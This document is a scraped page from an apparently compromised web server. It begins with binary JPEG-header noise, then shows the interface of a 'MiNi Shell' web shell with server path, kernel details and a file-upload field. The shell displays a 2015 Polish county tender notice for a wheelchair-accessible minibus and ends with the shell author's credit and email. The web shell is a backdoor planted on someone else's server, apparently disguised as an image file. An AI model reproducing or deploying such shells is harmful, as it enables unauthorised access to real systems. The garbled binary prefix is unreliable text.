JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150401/73520-N-2015.html

<p class="kh_header"><b>Płock: Dostawa - zakup autobusu przystosowanego do przewozu osób niepełnosprawnych, w tym na wózkach + winda</b><br>
<b>Numer ogłoszenia: 73520 - 2015; data zamieszczenia: 01.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Płocki reprezentowany przez Zarząd Powiatu w Płocku , ul. Bielska 59, 09-400 Płock, woj. mazowieckie, tel. 024 2676800, faks 024 2676848.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa - zakup autobusu przystosowanego do przewozu osób niepełnosprawnych, w tym na wózkach + winda.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Samochód (minibus) stanowiący przedmiot zamówienia winien być fabrycznie nowy, 16-sto miejscowy  (1 kierowca + 15 pasażerów), z możliwością przewozu dwóch osób na wózkach inwalidzkich o napędzie elektrycznym w konfiguracji: kierowca + 15 pasażerów, w tym dwie osoby na wózkach elektrycznych. 
Samochód winien posiadać świadectwo homologacji pojazdu i świadectwo homologacji przystosowania pojazdu do przewozu osób niepełnosprawnych  
Lp.	Szczegółowy opis przedmiotu zamówienia oraz zestaw parametrów techniczno - użytkowych
1.	Rok produkcji	Nie starszy niż 2014 - fabrycznie nowy
2.	Rodzaj silnika	Silnik wysokoprężny zasilany olejem napędowym z turbodoładowaniem.
3.	Wymogi ekologiczne	Jednostka napędowa spełniająca normę emisji spalin EURO 6 
4.	Pojemność skokowa silnika / moc	Minimum 1900 cm3 / minimum 120 KM
5.	Zbiornik paliwa	Minimum 70 litrów
6.	Skrzynia biegów	6-cio biegowa (+ bieg wsteczny)
7.	Napęd kół	Przedni lub tylny z elektronicznym układem stabilizacji toru jazdy (EDS, ASR, MSR, ESP lub równoważny)
8.	Liczba miejsc	Samochód osobowy typu minibus - ilość miejsc siedzących 16 (1 kierowca + 15 pasażerów), w tym z możliwością transportu 2 osób na wózkach inwalidzkich o napędzie elektrycznym po uprzednim demontażu foteli. 
9.	Układ elektryczny	Instalacja elektryczna pojazdu zabezpieczona i dostosowana do wyposażenia dodatkowego
10.	Dopuszczalna masa całkowita pojazdu	Do 5500 kg
11.	Oznakowanie pojazdu	Plansze magnetyczne, nakładane na nadwozie samochodu z każdej strony pojazdu z symbolami o przewozie osób niepełnosprawnych zgodnie z art.58 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r. poz. 1137 z późn. zm.) - odblaskowe, czytelne
		Dodatkowe oświetlenie pojazdu na dachu z tyłu pojazdu (kierunkowskazy, światła pozycyjne, światła stop)
12.	Układ hamulcowy	Wyposażony w system zapobiegający blokowaniu kół podczas hamowania (ABS)
13.	Układ kierowniczy	Wspomaganie układu kierowniczego
		Przekładnia z blokadą koła kierownicy
		Regulowana wysokość kierownicy w dwóch płaszczyznach
14.	Koła / ogumienie	Opony letnie na felgach stalowych
		Koło zapasowe - pełnowymiarowe
		Dodatkowy komplet 4 szt. kół z oponami zimowymi na obręczach stalowych. Opony fabrycznie nowe, nie starsze niż 12 miesięcy od daty produkcji umieszczonej na oponach. Rozmiar opon, nośność, indeks prędkości zgodny z zaleceniami producenta samochodu (karta gwarancyjna na opony).
		Komplet narzędzi, w tym podnośnik oraz klucz do kół.









15.
















	








Wyposażenie pojazdu















	Poduszka gazowa (airbag) dla kierowcy
		Centralny zamek fabryczny w kluczyku lub sterowany pilotem
		Immobiliser fabryczny
		Autoalarm honorowany przez firmy ubezpieczeniowe (atest).
		Fotel kierowcy z regulacją: podparcia odcinka lędźwiowego; przesuwu; kąta oparcia; wysokością siedziska oraz podłokietnikiem
		Elektrycznie regulowana szyba w drzwiach kierowcy
		Kolor nadwozia: wg gamy kolorów producenta
		Klimatyzacja dla kierowcy
		Lusterka zewnętrzne regulowane, podgrzewane elektrycznie.
		Przednie reflektory przeciwmgielne
		Asystent parkowania - czujniki PDC wbudowane w zderzak tylny
		Sygnalizacja dźwiękowa (akustyczna) podczas cofania pojazdu tzw. Beep.
		Wbudowane radio z odtwarzaczem CD sterowane z miejsca kierowcy. Instalacja nagłośnieniowa w przedziale pasażerskim zintegrowana z w/w radio - odtwarzaczem.
		2 gaśnice, apteczka, trójkąt ostrzegawczy umieszczone w oznaczonym, dostępnym miejscu.
		Drzwi tylne, przeszklone, dwuskrzydłowe. 
		Komplet kluczyków (pilotów).
		Tachograf cyfrowy.















16.





















	














Charakterystyka zabudowy pojazdu




















	Drzwi boczne (prawe), przesuwane, przeszklone do przedziału pasażerskiego, otwierane elektrycznie z miejsca kierowcy (z możliwością awaryjnego otwierania od wewnątrz i z zewnątrz), zapewniające dogodne wejście osobom ograniczonym ruchowo - maksymalnie szerokie. Zabezpieczenie drzwi przed nieautoryzowanym otwarciem od wewnątrz. 
		Wszystkie fotele w pojeździe wyposażone w zagłówki z regulacją wysokości lub zagłówki zintegrowane z oparciem, podłokietniki i trzypunktowe, bezwładnościowe pasy bezpieczeństwa.
Fotele w konfiguracji zapewniającej maksymalnie dużo miejsca do zajmowania siedziska, w tym z opcją szybkiego demontażu dającego możliwość przewozu dwóch osób na wózkach inwalidzkich elektrycznych. 
		Atestowane mocowania dla 2 wózków inwalidzkich elektrycznych w podłodze pojazdu oraz pasy zabezpieczające osoby na wózkach. Wózki mocowane zamiennie z siedzeniami.
		Pełne przeszklenie pojazdu. 
		Izolacja dźwiękowo - termiczna ścian, dachu, podłogi.
		Półki bagażowe z zabezpieczeniem przed wypadaniem przewożonych przedmiotów (rodzaj zabezpieczenia: siatka, linka).
		Tapicerka przedziału pasażerskiego: ścian, dachu, foteli odporna na zużycie i zabrudzenia zapewniająca łatwe czyszczenie
		Oświetlenie wewnątrz kabiny kierowcy oraz w przedziale pasażerskim w technologii LED (dopuszcza się konwencjonalny system oświetlenia).
		Podłoga w kabinie pasażerskiej pokryta warstwą antypoślizgową, wodoodporną - łatwo zmywalna. 
		Antypoślizgowe maty oraz oświetlenie w stopniach wejściowych.
		Dodatkowy stopień, podest boczny pod drzwiami przesuwnymi, wysuwany mechanicznie zainstalowany pod progiem pojazdu  
		Uchwyty wejściowe oraz poręcze ułatwiające wsiadanie i wysiadanie z pojazdu w przestrzeni pasażerskiej w jaskrawym kolorze
		Klimatyzacja dla przedziału pasażerskiego sterowana niezależnie od układu klimatyzacji pojazdu. Z nawiewem poprzez kanały umieszczone w dachu lub podłodze.
		Wentylacja kabiny pasażerskiej z regulacją oraz filtrem przeciwpyłowym.
		Wyjście ewakuacyjne przedziału pasażerskiego.
		Drugi wymiennik ciepła z osobną regulacją i nawiewami na przedział pasażerski.
		Ogrzewanie postojowe niezależne dla przedziału pasażerskiego typu WEBASTO.
		Wybijaki szyb ewakuacyjnych zamontowane w widocznych dostępnych miejscach.
		Łatwy i bezpośredni dostęp kierowcy do przedziału pasażerskiego. Szyba bezpieczna za fotelem kierowcy.
		Winda do załadunku wózków inwalidzkich (wewnętrzna) z rozkładanymi poręczami i progiem uniemożliwiającym bezpośredni zjazd z platformy. Sterowana z użyciem panelu stałego oraz dodatkowego. Dodatkowy wyłącznik (hebel) zasilania windy. Winda z możliwością mechanicznej obsługi w tym awaryjny system opuszczania platformy. Udźwig minimum 250 kg. Urządzenie dźwigowe musi spełniać wymagania Dyrektywy UE i posiadać oznaczenie CE (Conformité Européenne).
Urządzenie powinno posiadać 24 miesięczną gwarancję. 
17.	Gwarancje	Gwarancja mechaniczna (na zespoły i podzespoły mechaniczne / elektryczne / elektroniczne) - minimum 24 miesiące bez limitu kilometrów.
		Gwarancja na powłokę lakierniczą - minimum 24 miesiące.
		Gwarancja producenta pojazdu na perforację nadwozia - minimum 5 lat.
		Gwarancja na wykonaną zabudowę dostosowującą do przewozu osób niepełnosprawnych - minimum 24 miesiące.
18.	Serwis	Serwis w autoryzowanej stacji obsługi w odległości do 100 km od siedziby Zamawiającego.
19. 	Dokumenty	Atest dla systemu alarmowego honorowany przez ubezpieczycieli.
		Dokument UDT windy wózka inwalidzkiego 
		Świadectwo homologacji potwierdzające przystosowanie pojazdu do przewozu osób niepełnosprawnych
		Instrukcja obsługi w języku polskim
		Książka gwarancyjna wraz ze szczegółowymi warunkami gwarancji i serwisu oraz książka przeglądów serwisowych
		Karta pojazdu. Ważne badania techniczne. 
		Atesty, certyfikaty, gwarancje dotyczące oznaczonych wyżej elementów wyposażenia. 
 
Pojazd stanowiący przedmiot zamówienia musi spełniać warunki określone w art. 58, 66 i 68 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (t.j. Dz. U. z 2012 r. poz. 1137 z późn. zm.), rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (t.j. Dz. U. z 2015 r., poz. 305) oraz warunki przewidziane przez przepisy prawa wspólnotowego Unii Europejskiej zapisane w Dyrektywie Parlamentu i Rady Europy 2007/46/WE dotyczące przewozu osób niepełnosprawnych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się możliwość udzielenia wykonawcy dostawy zamówienia uzupełniającego, stanowiącego nie więcej niż 20 % wartości zamówienia podstawowego i polegającego na rozszerzeniu dostawy o dodatkowe wyposażenie.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.12.00.00-4, 34.12.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 4 500,00 PLN (słownie: cztery tysiące pięćset złotych).
 2. Wadium wnosi się przed upływem terminu składania ofert.
 3. Wykonawca może wnieść wadium w:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275, z późn. zm.).
4. W przypadku wnoszenia wadium w pieniądzu Wykonawca jest zobowiązany wpłacić wadium przelewem na rachunek 45 9042 0003 0000 1603 2000 0050
(ksero przelewu dołączyć do oferty).
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku       bankowym.
6. W przypadku wadium wnoszonego w innej formie niż w pieniądzu, Wykonawca załączy do oferty kserokopię dokumentu potwierdzonego za zgodność z oryginałem przez Wykonawcę. Oryginał dokumentu należy załączyć oddzielnie, nie spięty z ofertą. Z treści dokumentu (gwarancji, poręczenia) winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.      
7. Oferta nie zabezpieczona akceptowaną formą wadium spowoduje wykluczenie Wykonawcy.
8. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z  wyjątkiem   Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a u.p.z.p.
9.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
10. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 u.p.z.p., jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
12. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z  odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 u.p.z.p., z  przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o  których mowa w art. 25 ust. 1 u.p.z.p. (pkt VIII i jeśli dotyczy w pkt IX siwz),  pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o  której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na  warunkach określonych w ofercie;
2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe   z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 u.p.z.p.;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 u.p.z.p.;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 u.p.z.p.,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w ramach tego warunku Wykonawca zobowiązany jest do wykazania, że posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 180 000,00 zł brutto,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, w przypadku gdy o  udzielenie zamówienia ubiegają się Wykonawcy wspólnie składający ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 92</li>
<li>2 - minimum 36 - miesięczna gwarancja mechaniczna (na zespoły i podzespoły mechaniczne/elektryczne/elektroniczne) bez limitu kilometrów - 2</li>
<li>3 - minimum 36 - miesięczna gwarancja na powłokę lakierniczą - 2</li>
<li>4 - minimum 6 - letnia gwarancja na perforację nadwozia - 2</li>
<li>5 - minimum 36 - miesięczna gwarancja na zabudowę dostosowującą do przewozu osób niepełnosprawnych - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy zgodnie z art. 144 ust. 1 u.p.z.p. jeżeli konieczność ich wprowadzenia wyniknie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w  szczególności dotyczących zmiany wynagrodzenia Wykonawcy określonego w umowie - w przypadku zmiany stawki urzędowej podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiat-plock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Ekonomiczny Szkół w Płocku, ul. Bielska 59, p. 408.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2015 godzina 10:00, miejsce: W siedzibie Zamawiającego w Kancelarii (pok. 212), codziennie w dni pracy Urzędu w godz. 800 - 1500.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com